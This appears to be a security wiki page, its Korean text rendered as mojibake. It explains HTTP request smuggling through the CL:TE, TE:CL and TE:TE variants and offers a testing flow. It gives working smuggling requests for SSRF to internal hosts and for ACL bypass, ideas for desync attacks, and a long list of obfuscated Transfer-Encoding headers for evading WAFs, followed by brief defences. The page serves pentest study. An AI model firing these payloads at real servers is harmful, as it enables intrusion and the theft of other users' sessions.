Back

HTTP Request Smuggling

๐Ÿ” Introduction

HTTP Request Smuggling์€ network hops๋กœ ๊ตฌ์„ฑ๋œ ํ™˜๊ฒฝ์—์„œ ๊ฐ ๊ตฌ๊ฐ„์˜ ์„œ๋ฒ„, ์žฅ๋น„ ๋“ฑ์—์„œ HTTP Request๋ฅผ ์ฒ˜๋ฆฌํ•  ๋•Œ ์ฐจ์ด์ ์œผ๋กœ ์ธํ•ด ๋ฐœ์ƒํ•˜๋Š” ๋ฌธ์ œ์ž…๋‹ˆ๋‹ค. ๋ณดํŽธ์ ์œผ๋กœ Content-Length์™€ Transfer-Encoding์„ ๋™์‹œ์— ์ „๋‹ฌํ•˜์—ฌ ๊ตฌ๊ฐ„ ๋ณ„๋กœ HTTP Reuqest์˜ ๊ธธ์ด๋ฅผ ์ž˜ ๋ชป ์ธ์ง€ํ•˜๋„๋ก ์œ ๋„ํ•ฉ๋‹ˆ๋‹ค.

๊ธธ์ด๊ฐ€ ์ฐจ์ด๊ฐ€ ๋‚˜๋Š” ๊ฒฝ์šฐ ๊ฐ ์„œ๋ฒ„๊ฐ€ ์ธ์ง€ํ•˜๋Š” ๊ธธ์ด๊ฐ€ ๋‹ค๋ฅด๊ธฐ ๋•Œ๋ฌธ์— ์š”์ฒญ์˜ ์ผ๋ถ€๊ฐ€ ์ž˜๋ฆฌ๊ฒŒ ๋˜๊ณ , ์ด๋Š” ๋‹ค์Œ ์š”์ฒญ์—์„œ ์†Œ์ผ“์ƒ์œผ๋กœ ๋ถ™์–ด์„œ ์ฒ˜๋ฆฌ๋ฉ๋‹ˆ๋‹ค. ์ด๋ฅผ HTTP Request Smuggling์ด๋ผ๊ณ  ๋ถ€๋ฆ…๋‹ˆ๋‹ค. ์—ฌ๊ธฐ์„œ LB์™€ ๊ฐ™์ด ๋กœ๋“œ ๋ฐธ๋Ÿฐ์‹ฑ์„ ํ•˜๋Š” ๊ตฌ์กฐ๋ผ๋ฉด, ํƒ€ ์‚ฌ์šฉ์ž์˜ ์š”์ฒญ์— ์†Œ์ผ“์ด ๋ฌผ๋ฆด ์ˆ˜๋„ ์žˆ๋Š”๋ฐ ์ด๋Ÿฌํ•œ ๊ฒฝ์šฐ ํƒ€ ์‚ฌ์šฉ์ž์˜ ์›น ์š”์ฒญ์„ ์ž„์˜๋กœ ๋ณ€์กฐ์‹œํ‚ฌ ์ˆ˜ ์žˆ๊ณ  ์ด๋ฅผ Desync Attack์ด๋ผ๊ณ  ํ•ฉ๋‹ˆ๋‹ค.

Content-Length

Content-Length๋Š” ๋Œ€๋‹ค์ˆ˜์˜ ์›น ์š”์ฒญ์—์„œ ๊ธฐ๋ณธ์ ์œผ๋กœ ์‚ฌ์šฉํ•˜๋Š” ๊ธธ์ด์— ๋Œ€ํ•œ ํ—ค๋”์ž…๋‹ˆ๋‹ค. HTTP Body์˜ ๊ธธ์ด๋ฅผ Content-Length ํ—ค๋”์— ํฌํ•จํ•˜์—ฌ ๊ฐ™์ด ์ „๋‹ฌํ•ฉ๋‹ˆ๋‹ค.

POST / HTTP/1.1
Host: www.hahwul.com
Content-Length: 4

asdf

๋งŒ์•ฝ ์‹ค์ œ Content-Length์™€ Body์˜ ๊ฐ’์˜ ๊ธธ์ด๊ฐ€ ๋‹ค๋ฅด๋‹ค๋ฉด ์š”์ฒญ์ด ์ž˜๋ฆฌ๊ฑฐ๋‚˜(CL ํ—ค๋”๊ฐ€ ์ž‘์€ ๊ฒฝ์šฐ), ๊ธฐ๋‹ค๋ฆฌ๋‹ค๊ฐ€ Timeout(CL ํ—ค๋”๊ฐ€ ๋” ํฐ ๊ฒฝ์šฐ)์ด ๋ฐœ์ƒํ•ฉ๋‹ˆ๋‹ค.

Transfer-Encoding: chunked

chunked๋Š” ์ŠคํŠธ๋ฆฌ๋ฐ ๋“ฑ ๋Œ€์šฉ๋Ÿ‰ ํŒŒ์ผ ์ „์†ก์„ ์œ„ํ•ด ๊ณ ์•ˆ๋œ HTTP ํ—ค๋”์ž…๋‹ˆ๋‹ค. Connetion ๋‹จ์œ„๋กœ ๋ฐ์ดํ„ฐ์˜ ์‹œ์ž‘๊ณผ ๋์„ ํ•œ๋ฒˆ์— ์ฒ˜๋ฆฌํ•˜๋Š” ์ผ๋ฐ˜์ ์ธ HTTP Request์™€ ๋‹ค๋ฅด๊ฒŒ chunked๋œ ์š”์ฒญ์€ ํ•˜๋‚˜์˜ ๋ฐ์ดํ„ฐ๊ฐ€ ์—ฌ๋Ÿฌ๋ฒˆ์˜ HTTP Request๋กœ ๊ตฌ์„ฑ๋  ์ˆ˜ ์žˆ๋„๋ก ์ง€์›ํ•ฉ๋‹ˆ๋‹ค. ํฌ๋งท์€ ์•„๋ž˜์™€ ๊ฐ™์Šต๋‹ˆ๋‹ค.

HTTP body

๊ธธ์ด\r\n
๊ฐ’\r\n
๊ธธ์ด\r\n
๊ฐ’\r\n

์œ„์™€ ๊ฐ™์ด 2๊ฐœ์˜ ๋ผ์ธ์„ ๊ธฐ์ค€์œผ๋กœ ๊ธธ์ด์™€ ๊ฐ’์œผ๋กœ ํ‘œ๊ธฐํ•ฉ๋‹ˆ๋‹ค. ํ•ด๋‹น ์š”์ฒญ์€ ์—ฌ๋ ค๋ฒˆ์˜ HTTP Reuqest๋กœ ์ „๋‹ฌ๋˜์–ด๋„ ํ•˜๋‚˜์˜ ๋ฐ์ดํ„ฐ๋กœ ๋ณด๋ฉฐ, ๋งˆ์ง€๋ง‰์—” ๋๋งบ์Œ์„ ์˜๋ฏธํ•˜๋Š” 0\r\n ์ด ์žˆ๋Š” ๊ฒฝ์šฐ์— ์ „์ฒด ๋ฐ์ดํ„ฐ ์ „์†ก์ด ์™„๋ฃŒ๋˜์—ˆ๋‹ค๊ณ  ํŒ๋‹จํ•˜๊ฒŒ ๋ฉ๋‹ˆ๋‹ค. 0\r\n์ด ๋„์ฐฉํ•˜์ง€ ์•Š๋Š”๋‹ค๋ฉด ์„œ๋ฒ„๋Š” ์š”์ฒญ์„ ๊ณ„์† ๊ธฐ๋‹ค๋ฆฌ๊ฒŒ ๋ฉ๋‹ˆ๋‹ค. ์‹ค์ œ ์˜ˆ์‹œ๋กœ ๋ณด๋ฉด ์•„๋ž˜์™€ ๊ฐ™์Šต๋‹ˆ๋‹ค.

POST / HTTP/1.1
Host: www.hahwul.com
Transfer-Encoding: chunked

3
ABC
0

์œ„ ์š”์ฒญ์—์„œ 3์€ ์•„๋ž˜์—์„œ ์‚ฌ์šฉํ•˜๋Š” ABC์˜ ๊ธธ์ด, ๋‘๋ฒˆ์งธ ์ค„์ธ ABC๋Š” ๊ฐ’ ๊ทธ๋ฆฌ๊ณ  ๋งˆ์ง€๋ง‰์— 0์€ ์š”์ฒญ์˜ ๋งˆ์ง€๋ง‰์„ ์˜๋ฏธํ•ฉ๋‹ˆ๋‹ค. HTTP ์š”์ฒญ์„ ๋‚˜๋ˆ ์„œ ์ „์†กํ•˜๋Š” ๊ฒฝ์šฐ ์ด๋Ÿฌํ•œ ์š”์ฒญ์ด ๋ฐœ์ƒํ• ๊ป๋‹ˆ๋‹ค.

Request 1

POST / HTTP/1.1
Host: www.hahwul.com
Transfer-Encoding: chunked

3
ABC

Request 2

POST / HTTP/1.1
Host: www.hahwul.com
Transfer-Encoding: chunked

2
AB
0

Attack Point & Testing Flow

์œ„ ๋‚ด์šฉ๊นŒ์ง€ ๊ธ€์„ ์ฝ์—ˆ๋‹ค๋ฉด Content-Length(CL) ํ—ค๋”์™€ Transfer-Encoding(TE) ํ—ค๋”๊ฐ€ ์–ด๋–ป๊ฒŒ ๋™์ž‘ํ•˜๋Š”์ง€ ์•Œ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์š”์ ์€ ์ด 2๊ฐœ์˜ ํ—ค๋”๊ฐ€ ๋™์‹œ์— ์ „๋‹ฌ๋˜์—ˆ์„ ๋–„ ์—ฌ๋Ÿฌ๊ฐœ์˜ network hops์—์„œ ์„œ๋กœ ๋‹ค๋ฅด๊ฒŒ ์ฒ˜๋ฆฌํ•˜๊ฒŒ ํ•˜์—ฌ ๊ฐ•์ œ๋กœ ์š”์ฒญ์„ ์ž˜๋ฆฌ๊ฒŒ ๋งŒ๋“œ๋Š” ๋ฐฉ๋ฒ•์ž…๋‹ˆ๋‹ค.

๊ฐœ์ธ์ ์œผ๋กœ ์ƒ๊ฐํ•  ๋•Œ 4๊ฐœ ์ •๋„์˜ ํ”Œ๋กœ์šฐ๋กœ ์ง„ํ–‰ํ•˜๋ฉด, ์ทจ์•ฝ ํฌ์ธํŠธ ๋ฐœ๊ฒฌ๋ถ€ํ„ฐ ์‹ค์ œ ์˜ํ–ฅ๋ ฅ ๊ฒ€์ฆ๊นŒ์ง€ ํ…Œ์ŠคํŠธํ•˜๊ธฐ ์‰ฝ์Šต๋‹ˆ๋‹ค.

Step Actions
1 Smuggling point ์ฐพ๊ธฐ(BurpSuite Scanning / smuggler.py / ์ˆ˜๋™ ํ…Œ์ŠคํŒ…)
2 Delay ์œ ๋„ํ•˜๊ธฐ. CL / TE๊ฐ„์˜ ๊ด€๊ณ„๋ฅผ ์ด์šฉํ•ด์„œ ์›๋ณธ ์š”์ฒญ๋ณด๋‹ค ๋”œ๋ ˆ์ด๊ฐ€ ๊ธธ์–ด์ง€๊ฑฐ๋‚˜ Gateway Timeout ๋“ฑ์„ ์œ ๋„
3 Delay๊ฐ€ ์œ ๋„๋œ ๊ฒฝ์šฐ Smuggling์˜ ๊ฐ€๋Šฅ์„ฑ์ด ์กด์žฌํ•˜๊ธฐ ๋•Œ๋ฌธ์— ์‹ค์ œ Size ์กฐ์ ˆ์„ ํ†ตํ•ด ์š”์ฒญ์„ ๋ถ„๋ฆฌํ•˜์—ฌ ํ…Œ์ŠคํŠธ- ๋ณดํ†ต ์ƒ์ดํ•œ Status code๋ฅผ ๊ฐ€์ง„ ํŽ˜์ด์ง€ 2๊ฐœ๋ฅผ ์ด์šฉํ•˜์—ฌ ํ…Œ์ŠคํŒ…- e.g Req1=200OK , Req2=301,400,404,500, etc…- Smuggling ์š”์ฒญ(Req1) ์ดํ›„์— ๋™์ผ ํŽ˜์ด์ง€ ์š”์ฒญ(Req1)์—์„œ Smuggled ๋œ Response(Req2)๊ฐ€ ์ฒ˜๋ฆฌ๋˜๋ฉด ์ทจ์•ฝ
4 Smuggilng์„ ํ†ตํ•ด ๋ฐœ์ƒํ•  ์ˆ˜ ์žˆ๋Š” ๋ฆฌ์Šคํฌ ํ…Œ์ŠคํŠธ (Exploiting ๊ณผ์ •)

CL:TE

CL:TE ๋Š” CL๊ณผ TE ํ—ค๋”๊ฐ€ ๋™์‹œ์— ์ „์†ก๋˜์—ˆ์„ ๋•Œ hops์—์„œ ์•ž๋‹จ์˜ ์„œ๋ฒ„๊ฐ€ CL์„ ์‹ ๋ขฐํ•˜๊ณ , ๋ฐฑ์—”๋“œ ์„œ๋ฒ„๊ฐ€ TE๋ฅผ ์‹ ๋ขฐํ•  ๋–„ ๋ฐœ์ƒํ•˜๋Š” ์ผ€์ด์Šค์ž…๋‹ˆ๋‹ค. ์•„๋ž˜์™€ ๊ฐ™์ด ์›น ์š”์ฒญ์„ ์ „์†กํ•˜๊ฒŒ ๋˜๋ฉด CL์€ 13์ด๊ธฐ ๋–„๋ฌธ์— Request ์ „๋ฌธ์„ ๋ชจ๋‘ ๋ฐฑ์—”๋“œ๋กœ ๋ณด๋‚ด๊ฒŒ๋˜๊ณ , ๋ฐฑ์—”๋“œ์—์„  TE๋ฅผ ๋ณด๊ณ  ์žˆ๋Š”๋ฐ, 0\r\n์ด ์™”๊ธฐ ๋•Œ๋ฌธ์— ์š”์ฒญ์„ ๋งˆ๋ฌด๋ฆฌํ•ฉ๋‹ˆ๋‹ค. ๊ทธ๋Ÿฌ๋ฉด SMUGGLED๋ผ๋Š” ๋ฌธ์ž์—ด์€ ์ฒ˜๋ฆฌ๋˜์ง€ ์•Š์€์ฑ„ ์†Œ์ผ“์— ๋‚จ์•„์žˆ๊ฒŒ ๋ฉ๋‹ˆ๋‹ค.

POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 13
Transfer-Encoding: chunked

0
SMUGGLED

์ด ์š”์ฒญ์ด ๋‹ค์Œ์˜ ์›น ์š”์ฒญ์ด ๋“ค์–ด์™”์„ ๋–„ ์•„๋ž˜์™€ ๊ฐ™์ด ๊ฒฐํ•ฉ๋ฉ๋‹ˆ๋‹ค.

SMUGGLEDPOST /page HTTP/1.1
Host: vulnerable-website.com

์ด๋กœ์จ ์šฐ๋ฆฌ๋Š” ๋‹ค์Œ ์š”์ฒญ์˜ ์ „์ฒด Request๋ฅผ ๋ณ€์กฐํ•˜๊ฒŒ ๋  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์ด๋ฅผ ์ด์šฉํ•ด์„œ Host ํ—ค๋”๋ฅผ ๋ฐ”๊พธ๊ฑฐ๋‚˜ ์›น ํŽ˜์ด์ง€๋ฅผ ๋ฐ”๊พธ๋Š” ๋“ฑ์˜ ํ–‰์œ„๊ฐ€ ๊ฐ€๋Šฅํ•ฉ๋‹ˆ๋‹ค. Attack ์— ๋Œ€ํ•œ ๋‚ด์šฉ์€ ์•„๋ž˜ Offensive techniques ๋ถ€๋ถ„์—์„œ ์กฐ๊ธˆ ๋” ์ž์„ธํžˆ ๋‹ค๋ฃจ๊ฒ ์Šต๋‹ˆ๋‹ค.

TE:CL

CL:TE์™€๋Š” ๋ฐ˜๋Œ€๋กœ ํ—ค๋”๊ฐ€ ๋™์‹œ ์ „์†ก๋˜์—ˆ์„ ๋•Œ TE:CL์€ ํ”„๋ก ํŠธ ์„œ๋ฒ„๊ฐ€ TE๋ฅผ ์‹ ๋ขฐ, ๋ฐฑ์—”๋“œ๋Š” CL์ด ์‹ ๋ขฐ๋ฐ›๋Š” ๊ฒฝ์šฐ์ž…๋‹ˆ๋‹ค. ์•„๋ž˜์™€ ๊ฐ™์ด ์›น ์š”์ฒญ์ด ์ „์†ก๋˜๋ฉด ์•ž๋‹จ ์„œ๋ฒ„๋Š” TE๋ฅผ ์‹ ๋ขฐํ•˜๊ธฐ ๋•Œ๋ฌธ์— ์š”์ฒญ ์ „๋ฌธ(0\r\n ๊นŒ์ง€์˜ ๋ฐ์ดํ„ฐ)์„ ๋ฐฑ์—”๋“œ๋กœ ์ „์†กํ•˜๊ฒŒ ๋˜๊ณ , ๋ฐฑ์—”๋“œ๋Š” CL ํ—ค๋”๋ฅผ ๋ณด๊ธฐ ๋•Œ๋ฌธ์— 3 ๊ธธ์ด์˜ ๊ฐ’(8\r\n)๋งŒ ์‚ฌ์šฉํ•˜๊ณ  ๋‚˜๋จธ์ง€๋Š” ๋ฒ„๋ ค์ง€๊ฒŒ ๋ฉ๋‹ˆ๋‹ค. ์ด๋กœ์ธํ•ด SMUGGLED ๋‹จ์–ด ์ดํ›„๋ถ€ํ„ด ์ฒ˜๋ฆฌ๋˜์ง€ ์•Š๊ณ  ์†Œ์ผ“์— ๋‚จ์•˜๊ธฐ ๋–„๋ฌธ์— ๋‹ค์Œ ์š”์ฒญ์—์„œ ๊ฒฐํ•ฉ๋˜์–ด ์‚ฌ์šฉ๋ฉ๋‹ˆ๋‹ค. (๋ฐฉ์‹์€ CL:TE์™€ ๋™์ผํ•ฉ๋‹ˆ๋‹ค)

POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 3
Transfer-Encoding: chunked

8
SMUGGLED
0

TE:TE

TE:TE๋Š” Transfer Encoding์„ ๋น„์ •์ƒ์ ์ธ ๋ฐฉ๋ฒ•(์•ž์— ํƒญ์ด๋‚˜ ๊ณต๋ฐฑ ์ถ”๊ฐ€)์œผ๋กœ ์ „์†ก ํ–ˆ์„ ๋•Œ ๊ฐ ์„œ๋ฒ„๊ฐ„์˜ ์ฐจ์ด๋กœ ์ธํ•ด์„œ ์„œ๋กœ TE๋ฅผ ์ฒ˜๋ฆฌํ•œ ๋ฐฉ์‹์ด ๋‹ค๋ฆ„์„ ์ด์šฉํ•œ ์ผ€์ด์Šค์ž…๋‹ˆ๋‹ค. Hops๊ฐ€ ๋งŽ์œผ๋ฉด ๋ณดํ†ต TE:TE๋กœ ๋ถ€๋ฅด์ง€ ์•Š์ง€๋งŒ, ๋‹จ์ˆœํ•œ ๊ฒฝ์šฐ TE:TE๋กœ ์ด์•ผ๊ธฐํ•˜๊ธฐ๋„ ํ•ฉ๋‹ˆ๋‹ค.

์˜ˆ๋ฅผ๋“ค๋ฉด ์ด๋Ÿฌํ•œ ์ผ€์ด์Šค์ž…๋‹ˆ๋‹ค.

POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 3
  Transfer-Encoding: chunked
Transfer-Encoding: identity


8
SMUGGLED
0


A ์„œ๋ฒ„๋Š” ๊ณต๋ฐฑ์ด ํฌํ•จ๋œ Transfer-Encoding: chunked ๋ฅผ ์‹ ๋ขฐํ•˜์—ฌ 0\r\n ๊นŒ์ง€ ํ™•์ธ ํ›„ ๋ฐฑ์—”๋“œ๋กœ ์ „๋‹ฌํ•ฉ๋‹ˆ๋‹ค. ๋ฐฑ์—”๋“œ์—์„œ Transfer-Encoding: identity ๋ฅผ ์ •์ƒ์ ์ธ TE ํ—ค๋”๋กœ ์‹ ๋ขฐํ•œ ๊ฒฝ์šฐ ์•ž์„  TE์™€ ๋’ค์˜ TE๋Š” ์„œ๋กœ ๋‹ค๋ฅธ ์ฒ˜๋ฆฌ ๋ฐฉ์‹์„ ๊ฐ€์ง€๊ธฐ ๋•Œ๋ฌธ์— ์ด๋กœ ์ธํ•ด์„œ ์š”์ฒญ์ด ์ž˜๋ฆฌ๊ฒŒ ๋ฉ๋‹ˆ๋‹ค.

๐Ÿ—ก Offensive techniques

์›น ์š”์ฒญ์„ ๋ณ€์กฐํ•  ์ˆ˜ ์žˆ๊ธฐ ๋•Œ๋ฌธ์— ์—ฌ๋Ÿฌ๊ฐ€์ง€์˜ Exploiting ๋ฐฉ๋ฒ•๋“ค์ด ์กด์žฌํ•ฉ๋‹ˆ๋‹ค. ํ™œ์šฉํ•˜๊ธฐ ๋‚˜๋ฆ„์ด๊ฒ ์ง€๋งŒ ๋Œ€ํ‘œ์ ์œผ๋กœ ์‚ฌ์šฉํ•˜๋Š” ๋ฐฉ๋ฒ•๋“ค ๋ช‡๊ฐ€์ง€๋ฅผ ์ •๋ฆฌํ•ด๋ด…๋‹ˆ๋‹ค.

Detect

ํƒ์ง€ ๋ฐฉ๋ฒ•์€ ๊ฐ„๋‹จํ•ฉ๋‹ˆ๋‹ค. ์‚ฌ์ด์ฆˆ๊ฐ€ ๋‹ค๋ฅธ Content-Length, Transfer-Encoding์„ ๋™์‹œ์— ๋ณด๋‚ด์„œ Delay๋ฅผ ์œ ๋„ํ•˜๋Š” ๋ฐฉ๋ฒ•์œผ๋กœ ์‰ฝ๊ฒŒ ์ฒดํฌํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

TE:CL์„ ์˜ˆ๋ฅผ๋“ค์–ด ๋ณด๋ฉด ์ด๋ ‡์Šต๋‹ˆ๋‹ค.

  1. ์•„๋ž˜ ์š”์ฒญ์€ CL์€ 11, TE๋Š” 0\r\n ๊นŒ์ง€๋กœ ์ž˜๋ฆฌ๋Š” ๋ถ€๋ถ„ ์—†์ด ์ •์ƒ ์š”์ฒญ์ž…๋‹ˆ๋‹ค.
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 11
Transfer-Encoding: chunked

1
A
0


  1. ์•„๋ž˜ ์š”์ฒญ์€ CL์€ 11๋กœ ์ •์ƒ์ด์ง€๋งŒ, TE๊ฐ€ 0\r\n์œผ๋กœ ๋๋‚˜์ง€ ์•Š์•˜๊ธฐ ๋•Œ๋ฌธ์— ๋ฐฑ์—”๋“œ์˜ Transfer Encoding์„ ์‹ ๋ขฐํ•˜๋Š” ์„œ๋ฒ„๋Š” connection keep-alive ์ƒํƒœ๋กœ 0\r\n์ด ์˜ฌ๋•Œ๊นŒ์ง€ ๋Œ€๊ธฐํ•˜๊ฒŒ ๋ฉ๋‹ˆ๋‹ค. ์ด๋กœ ์ธํ•ด์„œ delay๊ฐ€ ๋ฐœ์ƒํ•˜๋ฉฐ ์ด๋Š” ์ทจ์•ฝ ์„œ๋ฒ„์ผ ๊ฐ€๋Šฅ์„ฑ์ด ๋†’์Šต๋‹ˆ๋‹ค.
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 11
Transfer-Encoding: chunked

1
A
T


Exploiting - SSRF

๊ฐ€์žฅ ๊ธฐ๋ณธ์ ์ธ ๋ฐฉ๋ฒ•์€ Host ํ—ค๋” ๋“ฑ์„ ์กฐ์ž‘ํ•˜์—ฌ ๋‚ด๋ถ€๋กœ์˜ ์ ‘๊ทผ์„ ์œ ๋„ํ•˜๋Š” ๋ฐฉ๋ฒ•์ž…๋‹ˆ๋‹ค. ์ž˜๋ ค์ง„ ์š”์ฒญ์˜ ์‹œ์ž‘์ ์€ ๋‚ด๋ถ€์ด๊ธฐ ๋•Œ๋ฌธ์— Smuggling์„ ํ†ตํ•ด ๋‚ด๋ถ€์‹œ์Šคํ…œ ๋“ฑ์— ์ ‘๊ทผํ•  ์ˆ˜ ์žˆ๋Š” ๊ฐ€๋Šฅ์„ฑ์ด ์žˆ์Šต๋‹ˆ๋‹ค.

POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 50
Transfer-Encoding: chunked

0
GET / HTTP/1.1
Host: internal-service-host-name

Exploiting - Bypass ACL

๋•Œ๋•Œ๋กœ IP ๊ธฐ๋ฐ˜์œผ๋กœ ACL์ด ์กด์žฌํ•˜๋Š” ๊ฒฝ์šฐ๊ฐ€ ์žˆ๋Š”๋ฐ, ์ด๋ฅผ ์šฐํšŒํ•˜๋Š”๋ฐ ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 37
Transfer-Encoding: chunked

0
GET /api/v2/internal-apis HTTP/1.1

Exploiting - Desync

ํƒ€ ์‚ฌ์šฉ์ž์—๊ฒŒ ์˜ํ–ฅ์„ ์ฃผ๋Š” Desync attack์˜ ๊ฒฝ์šฐ ํ™œ์šฉ๋„๊ฐ€ ๋ฌด๊ถ๋ฌด์ง„ํ•ฉ๋‹ˆ๋‹ค.

  • ์•…์„ฑ ๋„๋ฉ”์ธ์œผ๋กœ Redirect (Host ํ—ค๋” ๋ณ€์กฐ)
  • 404 ์œ ๋„ (DOS)
  • Header ๊ธฐ๋ฐ˜ XSS (์ผ๋ฐ˜์ ์œผ๋กœ ํ—ค๋” ๊ธฐ๋ฐ˜ XSS๋Š” ์‹ค์ œ ํŠธ๋ฆฌ๊ฑฐํ•˜๊ธฐ ์–ด๋ ต์ง€๋งŒ, Desync attack์ด ์žˆ๋‹ค๋ฉด ์‰ฌ์›Œ์ง‘๋‹ˆ๋‹ค)
  • ์ค‘์š”์ •๋ณด ์œ ์ถœ(ํ—ค๋”์˜ ๋’ท ๋ถ€๋ถ„์ด ์ž˜๋ ค์„œ ๋ถ™๊ธฐ ๋•Œ๋ฌธ์— Host ํ—ค๋” ๋ณ€์กฐ ๋“ฑ์œผ๋กœ ์•…์„ฑ ๋„๋ฉ”์ธ์œผ๋กœ ์ธ์ฆ ์ฟ ํ‚ค๋‚˜ ํ—ค๋” ๋“ฑ์˜ ์ •๋ณด๋ฅผ ์œ ์ถœ์ด ๊ฐ€๋Šฅํ•จ

Bypass technic - Normalization Attack

Use IDN Char(%f9). IDN ๋ฌธ์ž๋Š” ์„œ๋ฒ„/์•ฑ ๋ณ„๋กœ ์ฒ˜๋ฆฌํ•˜๋Š” ๋ฐฉ์‹์ด ๋‹ค๋ฅด๊ธฐ ๋•Œ๋ฌธ์— ์ด๋ฅผ ํ™œ์šฉํ•˜์—ฌ ์šฐํšŒํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

Transfer-Encoding: chรนnked

Bypass technic - \x00

Transfer-Encoding: \x00chunked

Bypass technic - Bypass WAF

Foo: bar\r\n\rTransfer-Encoding: chunked

And Many patterns

%c: 0x1,0x4,0x8,0x9,0xa,0xb,0xc,0xd,0x1F,0x20,0x7f,0xA0,0xFF,0x7F,0x100 ๋“ฑ


 Transfer-Encoding: chunked
%cTransfer-Encoding%c: chunked
%cTransfer-Encoding: chunked
%cTransfer-Encoding: chunked%c
%cTransfer-Encoding:%cchunked
Content-Encoding: chunked
TRANSFER-ENCODING: CHUNKED
TrAnSFer-EnCODinG: cHuNkeD
Transf\x82r-Encoding: chunked
Transfer Encoding: chunked
Transfer Encoding:chunked
Transfer-Encoding : chunked
Transfer-Encoding%c: chunked
Transfer-Encoding%c: chunked%c
Transfer-Encoding%c:%cchunked
Transfer-Encoding:  chunked
Transfer-Encoding: 'chunked'
Transfer-Encoding: \
Transfer-Encoding: ch\x96nked
Transfer-Encoding: chunk
Transfer-Encoding: chunked%c
Transfer-Encoding: chunked%cX: X
Transfer-Encoding: chunked%c\nX: X
Transfer-Encoding: chunked, cow
Transfer-Encoding: chunked\r
Transfer-Encoding: chunked\r%cX: X
Transfer-Encoding: chunked\t
Transfer-Encoding: cow chunked bar
Transfer-Encoding: cow, chunked
Transfer-Encoding: cow\r\nTransfer-Encoding: chunked
Transfer-Encoding:%cchunked
Transfer-Encoding:%cchunked%c
Transfer-Encoding:\n chunked
Transfer-Encoding:\tchunked
Transfer-Encoding:\u000Bchunked
Transfer-Encoding:\xFFchunked
Transfer-Encoding\t:\tchunked
Transfer\r-Encoding: chunked
Transfer_Encoding: chunked
X: X%cTransfer-Encoding: chunked
X: X%c\nTransfer-Encoding: chunked
X: X\r%cTransfer-Encoding: chunked
X:X\nTransfer-Encoding: chunked
X:X\rTransfer-Encoding: chunked

๐Ÿ›ก Defensive techniques

Vendor and Library ๋‹จ Patch

๊ฐ€์žฅ ๊ฐ„ํŽธํ•œ ๋ฐฉ๋ฒ•์˜ ๋Œ€์‘๋ฐฉ๋ฒ•์ž…๋‹ˆ๋‹ค. ๊ฐ ์ทจ์•ฝ์ ์ด ์กด์žฌํ•˜๋Š” ์žฅ๋น„, ์„œ๋ฒ„์˜ ๊ฒฝ์šฐ ๊ฐœ๋ณ„์ ์œผ๋กœ ํŒจ์น˜๋ฅผ ์ œ๊ณตํ•˜๋Š” ๊ฒฝ์šฐ๊ฐ€ ๋งŽ์€๋ฐ ์ด๋ฅผ ์ด์šฉํ•˜์—ฌ ์ทจ์•ฝ์ ์„ ์ œ๊ฑฐํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ๋ณดํ†ต Bypass๋ฅผ ์œ„ํ•œ chunked ํ—ค๋”๋ฅผ ์ œ๊ฑฐํ•˜๋Š” ํ˜•ํƒœ, CL๊ณผ TE ํ—ค๋”๊ฐ€ ๋™์‹œ ์ „๋‹ฌ์„ ๋ง‰๋Š” ๋ฐฉ์‹์œผ๋กœ ์ ์šฉํ•œ ๊ฒƒ์œผ๋กœ ์•Œ๊ณ  ์žˆ์Šต๋‹ˆ๋‹ค.

์ด๋Ÿฌํ•œ ์ผ€์ด์Šค์ธ ๊ฒฝ์šฐ CVE๋ฅผ ๊ฐ€์ง€๊ณ  ์žˆ์„ ๊ฐ€๋Šฅ์„ฑ์ด ์žˆ๊ธฐ ๋•Œ๋ฌธ์— ์ทจ์•ฝ์ ์ด ๋ฐœ์ƒํ•˜๋Š” ์œ„์น˜๋ฅผ ์ •ํ™•ํ•˜๊ฒŒ ํŒŒ์•…ํ•œ ํ›„ ์žฅ๋น„, ์„œ๋ฒ„๋“ฑ์˜ ๋ฌธ์ œ๋ผ๋ฉด ํŒจ์น˜๋ฅผ ํ†ตํ•ด ํ•ด๊ฒฐํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

๋น„์ •์ƒ์ ์ธ ์š”์ฒญ ์ฐจ๋‹จ

CL, TE๊ฐ€ ๋™์‹œ์— ์กด์žฌํ•˜๋Š” ์›น ์š”์ฒญ์€ ์ •๋ง ์ผ๋ฐ˜์ ์ด์ง€ ์•Š์Šต๋‹ˆ๋‹ค. ์„œ๋ฒ„/์–ดํ”Œ๋ฆฌ์ผ€์ด์…˜ ๋“ฑ์—์„œ ๋™์‹œ์— ์˜ค๋Š” ๊ฒฝ์šฐ ์ฒ˜๋ฆฌํ•˜์ง€ ์•Š๋„๋ก ํ•œ๋‹ค๋ฉด ํ•ด๋‹น ์ทจ์•ฝ์ ์„ ๋ง‰์„ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ๋‹ค๋งŒ ์ด ๊ฒฝ์šฐ์— ์šฐํšŒํŒจํ„ด์œผ๋กœ ๋ฌด์‹œํ•  ์ˆ˜ ์žˆ๋Š” ๊ฐ€๋Šฅ์„ฑ์ด ์žˆ๊ธฐ ๋–„๋ฌธ์— ๊ผผ๊ผผํ•œ ๊ฒ€์ฆ์ด ํ•„์š”ํ•ฉ๋‹ˆ๋‹ค.

Unabled Transfer-Encoding

